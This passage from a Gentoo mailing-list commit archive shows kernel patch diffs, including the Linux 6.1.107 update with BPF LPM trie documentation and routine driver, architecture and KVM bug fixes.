+-	if (val & ACP_PGFSM_STATUS_MASK)
++	switch (desc->rev) {
++	case 3:
++	case 5:
++		acp_pgfsm_status_mask = ACP3X_PGFSM_STATUS_MASK;
++		acp_pgfsm_cntl_mask = ACP3X_PGFSM_CNTL_POWER_ON_MASK;
++		break;
++	case 6:
++		acp_pgfsm_status_mask = ACP6X_PGFSM_STATUS_MASK;
++		acp_pgfsm_cntl_mask = ACP6X_PGFSM_CNTL_POWER_ON_MASK;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	if (val & acp_pgfsm_status_mask)
+ 		snd_sof_dsp_write(sdev, ACP_DSP_BAR, base + PGFSM_CONTROL_OFFSET,
+-				  ACP_PGFSM_CNTL_POWER_ON_MASK);
++				  acp_pgfsm_cntl_mask);
+ 
+ 	ret = snd_sof_dsp_read_poll_timeout(sdev, ACP_DSP_BAR, base + PGFSM_STATUS_OFFSET, val,
+ 					    !val, ACP_REG_POLL_INTERVAL, ACP_REG_POLL_TIMEOUT_US);
+diff --git a/sound/soc/sof/amd/acp.h b/sound/soc/sof/amd/acp.h
+index 14148c311f504..b1414ac1ea985 100644
+--- a/sound/soc/sof/amd/acp.h
++++ b/sound/soc/sof/amd/acp.h
+@@ -22,8 +22,11 @@
+ #define ACP_REG_POLL_TIMEOUT_US                 2000
+ #define ACP_DMA_COMPLETE_TIMEOUT_US		5000
+ 
+-#define ACP_PGFSM_CNTL_POWER_ON_MASK		0x01
+-#define ACP_PGFSM_STATUS_MASK			0x03
++#define ACP3X_PGFSM_CNTL_POWER_ON_MASK		0x01
++#define ACP3X_PGFSM_STATUS_MASK			0x03
++#define ACP6X_PGFSM_CNTL_POWER_ON_MASK		0x07
++#define ACP6X_PGFSM_STATUS_MASK			0x0F
++
+ #define ACP_POWERED_ON				0x00
+ #define ACP_ASSERT_RESET			0x01
+ #define ACP_RELEASE_RESET			0x00
+diff --git a/tools/testing/selftests/net/forwarding/local_termination.sh b/tools/testing/selftests/net/forwarding/local_termination.sh
+index c5b0cbc85b3e0..9b5a63519b949 100755
+--- a/tools/testing/selftests/net/forwarding/local_termination.sh
++++ b/tools/testing/selftests/net/forwarding/local_termination.sh
+@@ -278,6 +278,10 @@ bridge()
+ cleanup()
+ {
+ 	pre_cleanup
++
++	ip link set $h2 down
++	ip link set $h1 down
++
+ 	vrf_cleanup
+ }
+ 
+diff --git a/tools/testing/selftests/net/forwarding/no_forwarding.sh b/tools/testing/selftests/net/forwarding/no_forwarding.sh
+index af3b398d13f01..9e677aa64a06a 100755
+--- a/tools/testing/selftests/net/forwarding/no_forwarding.sh
++++ b/tools/testing/selftests/net/forwarding/no_forwarding.sh
+@@ -233,6 +233,9 @@ cleanup()
+ {
+ 	pre_cleanup
+ 
++	ip link set dev $swp2 down
++	ip link set dev $swp1 down
++
+ 	h2_destroy
+ 	h1_destroy
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-29 16:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-29 16:49 UTC (permalink / raw
  To: gentoo-commits

commit:     33403c8ad79635593cd4b82e8c51d0f33f6f8229
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Aug 29 16:49:33 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Aug 29 16:49:33 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=33403c8a

Linux patch 6.1.107

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |     4 +
 1106_linux-6.1.107.patch | 14310 +++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 14314 insertions(+)

diff --git a/0000_README b/0000_README
index 5002259e..31e8b007 100644
--- a/0000_README
+++ b/0000_README
@@ -471,6 +471,10 @@ Patch:  1105_linux-6.1.106.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.106
 
+Patch:  1106_linux-6.1.107.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.107
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1106_linux-6.1.107.patch b/1106_linux-6.1.107.patch
new file mode 100644
index 00000000..b805e6df
--- /dev/null
+++ b/1106_linux-6.1.107.patch
@@ -0,0 +1,14310 @@
+diff --git a/Documentation/bpf/map_lpm_trie.rst b/Documentation/bpf/map_lpm_trie.rst
+new file mode 100644
+index 0000000000000..b4fce3f7c98ff
+--- /dev/null
++++ b/Documentation/bpf/map_lpm_trie.rst
+@@ -0,0 +1,181 @@
++.. SPDX-License-Identifier: GPL-2.0-only
++.. Copyright (C) 2022 Red Hat, Inc.
++
++=====================
++BPF_MAP_TYPE_LPM_TRIE
++=====================
++
++.. note::
++   - ``BPF_MAP_TYPE_LPM_TRIE`` was introduced in kernel version 4.11
++
++``BPF_MAP_TYPE_LPM_TRIE`` provides a longest prefix match algorithm that
++can be used to match IP addresses to a stored set of prefixes.
++Internally, data is stored in an unbalanced trie of nodes that uses
++``prefixlen,data`` pairs as its keys. The ``data`` is interpreted in
++network byte order, i.e. big endian, so ``data[0]`` stores the most
++significant byte.
++
++LPM tries may be created with a maximum prefix length that is a multiple
++of 8, in the range from 8 to 2048. The key used for lookup and update
++operations is a ``struct bpf_lpm_trie_key_u8``, extended by
++``max_prefixlen/8`` bytes.
++
++- For IPv4 addresses the data length is 4 bytes
++- For IPv6 addresses the data length is 16 bytes
++
++The value type stored in the LPM trie can be any user defined type.
++
++.. note::
++   When creating a map of type ``BPF_MAP_TYPE_LPM_TRIE`` you must set the
++   ``BPF_F_NO_PREALLOC`` flag.
++
++Usage
++=====
++
++Kernel BPF
++----------
++
++.. c:function::
++   void *bpf_map_lookup_elem(struct bpf_map *map, const void *key)
++
++The longest prefix entry for a given data value can be found using the
++``bpf_map_lookup_elem()`` helper. This helper returns a pointer to the
++value associated with the longest matching ``key``, or ``NULL`` if no
++entry was found.
++
++The ``key`` should have ``prefixlen`` set to ``max_prefixlen`` when
++performing longest prefix lookups. For example, when searching for the
++longest prefix match for an IPv4 address, ``prefixlen`` should be set to
++``32``.
++
++.. c:function::
++   long bpf_map_update_elem(struct bpf_map *map, const void *key, const void *value, u64 flags)
++
++Prefix entries can be added or updated using the ``bpf_map_update_elem()``
++helper. This helper replaces existing elements atomically.
++
++``bpf_map_update_elem()`` returns ``0`` on success, or negative error in
++case of failure.
++
++ .. note::
++    The flags parameter must be one of BPF_ANY, BPF_NOEXIST or BPF_EXIST,
++    but the value is ignored, giving BPF_ANY semantics.
++
++.. c:function::
++   long bpf_map_delete_elem(struct bpf_map *map, const void *key)
++
++Prefix entries can be deleted using the ``bpf_map_delete_elem()``
++helper. This helper will return 0 on success, or negative error in case
++of failure.
++
++Userspace
++---------
++
++Access from userspace uses libbpf APIs with the same names as above, with
++the map identified by ``fd``.
++
++.. c:function::
++   int bpf_map_get_next_key (int fd, const void *cur_key, void *next_key)
++
++A userspace program can iterate through the entries in an LPM trie using
++libbpf's ``bpf_map_get_next_key()`` function. The first key can be
++fetched by calling ``bpf_map_get_next_key()`` with ``cur_key`` set to
++``NULL``. Subsequent calls will fetch the next key that follows the
++current key. ``bpf_map_get_next_key()`` returns ``0`` on success,
++``-ENOENT`` if ``cur_key`` is the last key in the trie, or negative
++error in case of failure.
++
++``bpf_map_get_next_key()`` will iterate through the LPM trie elements
++from leftmost leaf first. This means that iteration will return more
++specific keys before less specific ones.
++
++Examples
++========
++
++Please see ``tools/testing/selftests/bpf/test_lpm_map.c`` for examples
++of LPM trie usage from userspace. The code snippets below demonstrate
++API usage.
++
++Kernel BPF
++----------
++
++The following BPF code snippet shows how to declare a new LPM trie for IPv4
++address prefixes:
++
++.. code-block:: c
++
++    #include <linux/bpf.h>
++    #include <bpf/bpf_helpers.h>
++
++    struct ipv4_lpm_key {
++            __u32 prefixlen;
++            __u32 data;
++    };
++
++    struct {
++            __uint(type, BPF_MAP_TYPE_LPM_TRIE);
++            __type(key, struct ipv4_lpm_key);
++            __type(value, __u32);
++            __uint(map_flags, BPF_F_NO_PREALLOC);
++            __uint(max_entries, 255);
++    } ipv4_lpm_map SEC(".maps");
++
++The following BPF code snippet shows how to lookup by IPv4 address:
++
++.. code-block:: c
++
++    void *lookup(__u32 ipaddr)
++    {
++            struct ipv4_lpm_key key = {
++                    .prefixlen = 32,
++                    .data = ipaddr
++            };
++
++            return bpf_map_lookup_elem(&ipv4_lpm_map, &key);
++    }
++
++Userspace
++---------
++
++The following snippet shows how to insert an IPv4 prefix entry into an
++LPM trie:
++
++.. code-block:: c
++
++    int add_prefix_entry(int lpm_fd, __u32 addr, __u32 prefixlen, struct value *value)
++    {
++            struct ipv4_lpm_key ipv4_key = {
++                    .prefixlen = prefixlen,
++                    .data = addr
++            };
++            return bpf_map_update_elem(lpm_fd, &ipv4_key, value, BPF_ANY);
++    }
++
++The following snippet shows a userspace program walking through the entries
++of an LPM trie:
++
++
++.. code-block:: c
++
++    #include <bpf/libbpf.h>
++    #include <bpf/bpf.h>
++
++    void iterate_lpm_trie(int map_fd)
++    {
++            struct ipv4_lpm_key *cur_key = NULL;
++            struct ipv4_lpm_key next_key;
++            struct value value;
++            int err;
++
++            for (;;) {
++                    err = bpf_map_get_next_key(map_fd, cur_key, &next_key);
++                    if (err)
++                            break;
++
++                    bpf_map_lookup_elem(map_fd, &next_key, &value);
++
++                    /* Use key and value here */
++
++                    cur_key = &next_key;
++            }
++    }
+diff --git a/Documentation/filesystems/gfs2-glocks.rst b/Documentation/filesystems/gfs2-glocks.rst
+index d14f230f0b123..93a690b9bcf2d 100644
+--- a/Documentation/filesystems/gfs2-glocks.rst
++++ b/Documentation/filesystems/gfs2-glocks.rst
+@@ -20,8 +20,7 @@ The gl_holders list contains all the queued lock requests (not
+ just the holders) associated with the glock. If there are any
+ held locks, then they will be contiguous entries at the head
+ of the list. Locks are granted in strictly the order that they
+-are queued, except for those marked LM_FLAG_PRIORITY which are
+-used only during recovery, and even then only for journal locks.
++are queued.
+ 
+ There are three lock states that users of the glock layer can request,
+ namely shared (SH), deferred (DF) and exclusive (EX). Those translate
+diff --git a/Makefile b/Makefile
+index f0fd656e9da3c..4c0fc0e5e002f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 106
++SUBLEVEL = 107
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/kernel/acpi_numa.c b/arch/arm64/kernel/acpi_numa.c
+index e51535a5f939a..ccbff21ce1faf 100644
+--- a/arch/arm64/kernel/acpi_numa.c
++++ b/arch/arm64/kernel/acpi_numa.c
+@@ -27,7 +27,7 @@
+ 
+ #include <asm/numa.h>
+ 
+-static int acpi_early_node_map[NR_CPUS] __initdata = { NUMA_NO_NODE };
++static int acpi_early_node_map[NR_CPUS] __initdata = { [0 ... NR_CPUS - 1] = NUMA_NO_NODE };
+ 
+ int __init acpi_numa_get_nid(unsigned int cpu)
+ {
+diff --git a/arch/arm64/kernel/setup.c b/arch/arm64/kernel/setup.c
+index fea3223704b63..44c4d79bd914c 100644
+--- a/arch/arm64/kernel/setup.c
++++ b/arch/arm64/kernel/setup.c
+@@ -360,9 +360,6 @@ void __init __no_sanitize_address setup_arch(char **cmdline_p)
+ 	smp_init_cpus();
+ 	smp_build_mpidr_hash();
+ 
+-	/* Init percpu seeds for random tags after cpus are set up. */
+-	kasan_init_sw_tags();
+-
+ #ifdef CONFIG_ARM64_SW_TTBR0_PAN
+ 	/*
+ 	 * Make sure init_thread_info.ttbr0 always generates translation
+diff --git a/arch/arm64/kernel/smp.c b/arch/arm64/kernel/smp.c
+index d323621d14a59..b606093a5596c 100644
+--- a/arch/arm64/kernel/smp.c
++++ b/arch/arm64/kernel/smp.c
+@@ -464,6 +464,8 @@ void __init smp_prepare_boot_cpu(void)
+ 		init_gic_priority_masking();
+ 
+ 	kasan_init_hw_tags();
++	/* Init percpu seeds for random tags after cpus are set up. */
++	kasan_init_sw_tags();
+ }
+ 
+ /*
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index 457e74f1f6717..974b94ad79523 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -30,6 +30,7 @@
+ #include <trace/events/kvm.h>
+ 
+ #include "sys_regs.h"
++#include "vgic/vgic.h"
+ 
+ #include "trace.h"
+ 
+@@ -200,6 +201,11 @@ static bool access_gic_sgi(struct kvm_vcpu *vcpu,
+ {
+ 	bool g1;
+ 
++	if (!kvm_has_gicv3(vcpu->kvm)) {
++		kvm_inject_undefined(vcpu);
++		return false;
++	}
++
+ 	if (!p->is_write)
+ 		return read_from_write_only(vcpu, p, r);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 5fb0bfc07d856..bc898229167bc 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -334,4 +334,11 @@ void vgic_v4_configure_vsgis(struct kvm *kvm);
+ void vgic_v4_get_vlpi_state(struct vgic_irq *irq, bool *val);
+ int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq);
+ 
++static inline bool kvm_has_gicv3(struct kvm *kvm)
++{
++	return (static_branch_unlikely(&kvm_vgic_global_state.gicv3_cpuif) &&
++		irqchip_in_kernel(kvm) &&
++		kvm->arch.vgic.vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3);
++}
++
+ #endif
+diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c
+index 482af80b81790..fdf00c228b67f 100644
+--- a/arch/mips/kernel/cpu-probe.c
++++ b/arch/mips/kernel/cpu-probe.c
+@@ -1723,12 +1723,16 @@ static inline void cpu_probe_loongson(struct cpuinfo_mips *c, unsigned int cpu)
+ 		c->ases |= (MIPS_ASE_LOONGSON_MMI | MIPS_ASE_LOONGSON_CAM |
+ 			MIPS_ASE_LOONGSON_EXT | MIPS_ASE_LOONGSON_EXT2);
+ 		c->ases &= ~MIPS_ASE_VZ; /* VZ of Loongson-3A2000/3000 is incomplete */
++		change_c0_config6(LOONGSON_CONF6_EXTIMER | LOONGSON_CONF6_INTIMER,
++				  LOONGSON_CONF6_INTIMER);
+ 		break;
+ 	case PRID_IMP_LOONGSON_64G:
+ 		__cpu_name[cpu] = "ICT Loongson-3";
+ 		set_elf_platform(cpu, "loongson3a");
+ 		set_isa(c, MIPS_CPU_ISA_M64R2);
+ 		decode_cpucfg(c);
++		change_c0_config6(LOONGSON_CONF6_EXTIMER | LOONGSON_CONF6_INTIMER,
++				  LOONGSON_CONF6_INTIMER);
+ 		break;
+ 	default:
+ 		panic("Unknown Loongson Processor ID!");
+diff --git a/arch/openrisc/kernel/setup.c b/arch/openrisc/kernel/setup.c
+index 0cd04d936a7a1..f2fe45d3094df 100644
+--- a/arch/openrisc/kernel/setup.c
++++ b/arch/openrisc/kernel/setup.c
+@@ -270,6 +270,9 @@ void calibrate_delay(void)
+ 
+ void __init setup_arch(char **cmdline_p)
+ {
++	/* setup memblock allocator */
++	setup_memory();
++
+ 	unflatten_and_copy_device_tree();
+ 
+ 	setup_cpuinfo();
+@@ -293,9 +296,6 @@ void __init setup_arch(char **cmdline_p)
+ 	}
+ #endif
+ 
+-	/* setup memblock allocator */
+-	setup_memory();
+-
+ 	/* paging_init() sets up the MMU and marks all pages as reserved */
+ 	paging_init();
+ 
+diff --git a/arch/parisc/kernel/irq.c b/arch/parisc/kernel/irq.c
+index 9ddb2e3970589..b481cde6bfb62 100644
+--- a/arch/parisc/kernel/irq.c
++++ b/arch/parisc/kernel/irq.c
+@@ -501,7 +501,7 @@ void do_cpu_irq_mask(struct pt_regs *regs)
+ 
+ 	old_regs = set_irq_regs(regs);
+ 	local_irq_disable();
+-	irq_enter();
++	irq_enter_rcu();
+ 
+ 	eirr_val = mfctl(23) & cpu_eiem & per_cpu(local_ack_eiem, cpu);
+ 	if (!eirr_val)
+@@ -536,7 +536,7 @@ void do_cpu_irq_mask(struct pt_regs *regs)
+ #endif /* CONFIG_IRQSTACKS */
+ 
+  out:
+-	irq_exit();
++	irq_exit_rcu();
+ 	set_irq_regs(old_regs);
+ 	return;
+ 
+diff --git a/arch/powerpc/boot/simple_alloc.c b/arch/powerpc/boot/simple_alloc.c
+index 267d6524caac4..d07796fdf91aa 100644
+--- a/arch/powerpc/boot/simple_alloc.c
++++ b/arch/powerpc/boot/simple_alloc.c
+@@ -112,8 +112,11 @@ static void *simple_realloc(void *ptr, unsigned long size)
+ 		return ptr;
+ 
+ 	new = simple_malloc(size);
+-	memcpy(new, ptr, p->size);
+-	simple_free(ptr);
++	if (new) {
++		memcpy(new, ptr, p->size);
++		simple_free(ptr);
++	}
++
+ 	return new;
+ }
+ 
+diff --git a/arch/powerpc/sysdev/xics/icp-native.c b/arch/powerpc/sysdev/xics/icp-native.c
+index edc17b6b1cc2f..9b2238d73003b 100644
+--- a/arch/powerpc/sysdev/xics/icp-native.c
++++ b/arch/powerpc/sysdev/xics/icp-native.c
+@@ -236,6 +236,8 @@ static int __init icp_native_map_one_cpu(int hw_id, unsigned long addr,
+ 	rname = kasprintf(GFP_KERNEL, "CPU %d [0x%x] Interrupt Presentation",
+ 			  cpu, hw_id);
+ 
++	if (!rname)
++		return -ENOMEM;
+ 	if (!request_mem_region(addr, size, rname)) {
+ 		pr_warn("icp_native: Could not reserve ICP MMIO for CPU %d, interrupt server #0x%x\n",
+ 			cpu, hw_id);
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 7ba5c244f3a07..ba2210b553f9c 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -816,7 +816,7 @@ static void __init create_kernel_page_table(pgd_t *pgdir,
+ 				   PMD_SIZE, PAGE_KERNEL_EXEC);
+ 
+ 	/* Map the data in RAM */
+-	end_va = kernel_map.virt_addr + XIP_OFFSET + kernel_map.size;
++	end_va = kernel_map.virt_addr + kernel_map.size;
+ 	for (va = kernel_map.virt_addr + XIP_OFFSET; va < end_va; va += PMD_SIZE)
+ 		create_pgd_mapping(pgdir, va,
+ 				   kernel_map.phys_addr + (va - (kernel_map.virt_addr + XIP_OFFSET)),
+@@ -947,7 +947,7 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 
+ 	phys_ram_base = CONFIG_PHYS_RAM_BASE;
+ 	kernel_map.phys_addr = (uintptr_t)CONFIG_PHYS_RAM_BASE;
+-	kernel_map.size = (uintptr_t)(&_end) - (uintptr_t)(&_sdata);
++	kernel_map.size = (uintptr_t)(&_end) - (uintptr_t)(&_start);
+ 
+ 	kernel_map.va_kernel_xip_pa_offset = kernel_map.virt_addr - kernel_map.xiprom;
+ #else
+diff --git a/arch/s390/include/asm/uv.h b/arch/s390/include/asm/uv.h
+index be3ef9dd69726..6abcb46a8dfe2 100644
+--- a/arch/s390/include/asm/uv.h
++++ b/arch/s390/include/asm/uv.h
+@@ -387,7 +387,10 @@ static inline int share(unsigned long addr, u16 cmd)
+ 
+ 	if (!uv_call(0, (u64)&uvcb))
+ 		return 0;
+-	return -EINVAL;
++	pr_err("%s UVC failed (rc: 0x%x, rrc: 0x%x), possible hypervisor bug.\n",
++	       uvcb.header.cmd == UVC_CMD_SET_SHARED_ACCESS ? "Share" : "Unshare",
++	       uvcb.header.rc, uvcb.header.rrc);
++	panic("System security cannot be guaranteed unless the system panics now.\n");
+ }
+ 
+ /*
+diff --git a/arch/s390/kernel/early.c b/arch/s390/kernel/early.c
+index 9693c8630e73f..b3cb256ec6692 100644
+--- a/arch/s390/kernel/early.c
++++ b/arch/s390/kernel/early.c
+@@ -237,15 +237,9 @@ static inline void save_vector_registers(void)
+ #endif
+ }
+ 
+-static inline void setup_control_registers(void)
++static inline void setup_low_address_protection(void)
+ {
+-	unsigned long reg;
+-
+-	__ctl_store(reg, 0, 0);
+-	reg |= CR0_LOW_ADDRESS_PROTECTION;
+-	reg |= CR0_EMERGENCY_SIGNAL_SUBMASK;
+-	reg |= CR0_EXTERNAL_CALL_SUBMASK;
+-	__ctl_load(reg, 0, 0);
++	__ctl_set_bit(0, 28);
+ }
+ 
+ static inline void setup_access_registers(void)
+@@ -304,7 +298,7 @@ void __init startup_init(void)
+ 	save_vector_registers();
+ 	setup_topology();
+ 	sclp_early_detect();
+-	setup_control_registers();
++	setup_low_address_protection();
+ 	setup_access_registers();
+ 	lockdep_on();
+ }
+diff --git a/arch/s390/kernel/smp.c b/arch/s390/kernel/smp.c
+index 0031325ce4bc9..436dbf4d743d8 100644
+--- a/arch/s390/kernel/smp.c
++++ b/arch/s390/kernel/smp.c
+@@ -1007,12 +1007,12 @@ void __init smp_fill_possible_mask(void)
+ 
+ void __init smp_prepare_cpus(unsigned int max_cpus)
+ {
+-	/* request the 0x1201 emergency signal external interrupt */
+ 	if (register_external_irq(EXT_IRQ_EMERGENCY_SIG, do_ext_call_interrupt))
+ 		panic("Couldn't request external interrupt 0x1201");
+-	/* request the 0x1202 external call external interrupt */
++	ctl_set_bit(0, 14);
+ 	if (register_external_irq(EXT_IRQ_EXTERNAL_CALL, do_ext_call_interrupt))
+ 		panic("Couldn't request external interrupt 0x1202");
++	ctl_set_bit(0, 13);
+ }
+ 
+ void __init smp_prepare_boot_cpu(void)
+diff --git a/arch/x86/kernel/process.c b/arch/x86/kernel/process.c
+index 279b5e9be80fc..acc83738bf5b4 100644
+--- a/arch/x86/kernel/process.c
++++ b/arch/x86/kernel/process.c
+@@ -991,7 +991,10 @@ unsigned long arch_align_stack(unsigned long sp)
+ 
+ unsigned long arch_randomize_brk(struct mm_struct *mm)
+ {
+-	return randomize_page(mm->brk, 0x02000000);
++	if (mmap_is_ia32())
++		return randomize_page(mm->brk, SZ_32M);
++
++	return randomize_page(mm->brk, SZ_1G);
+ }
+ 
+ /*
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index c90fef0258c51..3cd590ace95a3 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -1843,8 +1843,12 @@ static bool set_target_expiration(struct kvm_lapic *apic, u32 count_reg)
+ 		if (unlikely(count_reg != APIC_TMICT)) {
+ 			deadline = tmict_to_ns(apic,
+ 				     kvm_lapic_get_reg(apic, count_reg));
+-			if (unlikely(deadline <= 0))
+-				deadline = apic->lapic_timer.period;
++			if (unlikely(deadline <= 0)) {
++				if (apic_lvtt_period(apic))
++					deadline = apic->lapic_timer.period;
++				else
++					deadline = 0;
++			}
+ 			else if (unlikely(deadline > apic->lapic_timer.period)) {
+ 				pr_info_ratelimited(
+ 				    "kvm: vcpu %i: requested lapic timer restore with "
+diff --git a/block/blk-mq-tag.c b/block/blk-mq-tag.c
+index 100889c276c3f..dcd620422d01d 100644
+--- a/block/blk-mq-tag.c
++++ b/block/blk-mq-tag.c
+@@ -40,6 +40,7 @@ static void blk_mq_update_wake_batch(struct blk_mq_tags *tags,
+ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ {
+ 	unsigned int users;
++	unsigned long flags;
+ 	struct blk_mq_tags *tags = hctx->tags;
+ 
+ 	/*
+@@ -58,11 +59,11 @@ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ 			return;
+ 	}
+ 
+-	spin_lock_irq(&tags->lock);
++	spin_lock_irqsave(&tags->lock, flags);
+ 	users = tags->active_queues + 1;
+ 	WRITE_ONCE(tags->active_queues, users);
+ 	blk_mq_update_wake_batch(tags, users);
+-	spin_unlock_irq(&tags->lock);
++	spin_unlock_irqrestore(&tags->lock, flags);
+ }
+ 
+ /*
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
+index 2daf50d4cd47a..7810f974b2ca9 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -1118,8 +1118,8 @@ dequeue_rx(struct idt77252_dev *card, struct rsq_entry *rsqe)
+ 	rpp->len += skb->len;
+ 
+ 	if (stat & SAR_RSQE_EPDU) {
++		unsigned int len, truesize;
+ 		unsigned char *l1l2;
+-		unsigned int len;
+ 
+ 		l1l2 = (unsigned char *) ((unsigned long) skb->data + skb->len - 6);
+ 
+@@ -1189,14 +1189,15 @@ dequeue_rx(struct idt77252_dev *card, struct rsq_entry *rsqe)
+ 		ATM_SKB(skb)->vcc = vcc;
+ 		__net_timestamp(skb);
+ 
++		truesize = skb->truesize;
+ 		vcc->push(vcc, skb);
+ 		atomic_inc(&vcc->stats->rx);
+ 
+-		if (skb->truesize > SAR_FB_SIZE_3)
++		if (truesize > SAR_FB_SIZE_3)
+ 			add_rx_skb(card, 3, SAR_FB_SIZE_3, 1);
+-		else if (skb->truesize > SAR_FB_SIZE_2)
++		else if (truesize > SAR_FB_SIZE_2)
+ 			add_rx_skb(card, 2, SAR_FB_SIZE_2, 1);
+-		else if (skb->truesize > SAR_FB_SIZE_1)
++		else if (truesize > SAR_FB_SIZE_1)
+ 			add_rx_skb(card, 1, SAR_FB_SIZE_1, 1);
+ 		else
+ 			add_rx_skb(card, 0, SAR_FB_SIZE_0, 1);
+diff --git a/drivers/bluetooth/hci_ldisc.c b/drivers/bluetooth/hci_ldisc.c
+index 865112e96ff9f..c1feebd9e3a03 100644
+--- a/drivers/bluetooth/hci_ldisc.c
++++ b/drivers/bluetooth/hci_ldisc.c
+@@ -770,7 +770,8 @@ static int hci_uart_tty_ioctl(struct tty_struct *tty, unsigned int cmd,
+ 		break;
+ 
+ 	case HCIUARTGETPROTO:
+-		if (test_bit(HCI_UART_PROTO_SET, &hu->flags))
++		if (test_bit(HCI_UART_PROTO_SET, &hu->flags) &&
++		    test_bit(HCI_UART_PROTO_READY, &hu->flags))
+ 			err = hu->proto->id;
+ 		else
+ 			err = -EUNATCH;
+diff --git a/drivers/char/xillybus/xillyusb.c b/drivers/char/xillybus/xillyusb.c
+index 39bcbfd908b46..3a2a0fb3d928a 100644
+--- a/drivers/char/xillybus/xillyusb.c
++++ b/drivers/char/xillybus/xillyusb.c
+@@ -50,6 +50,7 @@ MODULE_LICENSE("GPL v2");
+ static const char xillyname[] = "xillyusb";
+ 
+ static unsigned int fifo_buf_order;
++static struct workqueue_struct *wakeup_wq;
+ 
+ #define USB_VENDOR_ID_XILINX		0x03fd
+ #define USB_VENDOR_ID_ALTERA		0x09fb
+@@ -561,10 +562,6 @@ static void cleanup_dev(struct kref *kref)
+  * errors if executed. The mechanism relies on that xdev->error is assigned
+  * a non-zero value by report_io_error() prior to queueing wakeup_all(),
+  * which prevents bulk_in_work() from calling process_bulk_in().
+- *
+- * The fact that wakeup_all() and bulk_in_work() are queued on the same
+- * workqueue makes their concurrent execution very unlikely, however the
+- * kernel's API doesn't seem to ensure this strictly.
+  */
+ 
+ static void wakeup_all(struct work_struct *work)
+@@ -619,7 +616,7 @@ static void report_io_error(struct xillyusb_dev *xdev,
+ 
+ 	if (do_once) {
+ 		kref_get(&xdev->kref); /* xdev is used by work item */
+-		queue_work(xdev->workq, &xdev->wakeup_workitem);
++		queue_work(wakeup_wq, &xdev->wakeup_workitem);
+ 	}
+ }
+ 
+@@ -1892,6 +1889,13 @@ static const struct file_operations xillyusb_fops = {
+ 
+ static int xillyusb_setup_base_eps(struct xillyusb_dev *xdev)
+ {
++	struct usb_device *udev = xdev->udev;
++
++	/* Verify that device has the two fundamental bulk in/out endpoints */
++	if (usb_pipe_type_check(udev, usb_sndbulkpipe(udev, MSG_EP_NUM)) ||
++	    usb_pipe_type_check(udev, usb_rcvbulkpipe(udev, IN_EP_NUM)))
++		return -ENODEV;
++
+ 	xdev->msg_ep = endpoint_alloc(xdev, MSG_EP_NUM | USB_DIR_OUT,
+ 				      bulk_out_work, 1, 2);
+ 	if (!xdev->msg_ep)
+@@ -1921,14 +1925,15 @@ static int setup_channels(struct xillyusb_dev *xdev,
+ 			  __le16 *chandesc,
+ 			  int num_channels)
+ {
+-	struct xillyusb_channel *chan;
++	struct usb_device *udev = xdev->udev;
++	struct xillyusb_channel *chan, *new_channels;
+ 	int i;
+ 
+ 	chan = kcalloc(num_channels, sizeof(*chan), GFP_KERNEL);
+ 	if (!chan)
+ 		return -ENOMEM;
+ 
+-	xdev->channels = chan;
++	new_channels = chan;
+ 
+ 	for (i = 0; i < num_channels; i++, chan++) {
+ 		unsigned int in_desc = le16_to_cpu(*chandesc++);
+@@ -1957,6 +1962,15 @@ static int setup_channels(struct xillyusb_dev *xdev,
+ 		 */
+ 
+ 		if ((out_desc & 0x80) && i < 14) { /* Entry is valid */
++			if (usb_pipe_type_check(udev,
++						usb_sndbulkpipe(udev, i + 2))) {
++				dev_err(xdev->dev,
++					"Missing BULK OUT endpoint %d\n",
++					i + 2);
++				kfree(new_channels);
++				return -ENODEV;
++			}
++
+ 			chan->writable = 1;
+ 			chan->out_synchronous = !!(out_desc & 0x40);
+ 			chan->out_seekable = !!(out_desc & 0x20);
+@@ -1966,6 +1980,7 @@ static int setup_channels(struct xillyusb_dev *xdev,
+ 		}
+ 	}
+ 
++	xdev->channels = new_channels;
+ 	return 0;
+ }
+ 
+@@ -2082,9 +2097,11 @@ static int xillyusb_discovery(struct usb_interface *interface)
+ 	 * just after responding with the IDT, there is no reason for any
+ 	 * work item to be running now. To be sure that xdev->channels
+ 	 * is updated on anything that might run in parallel, flush the
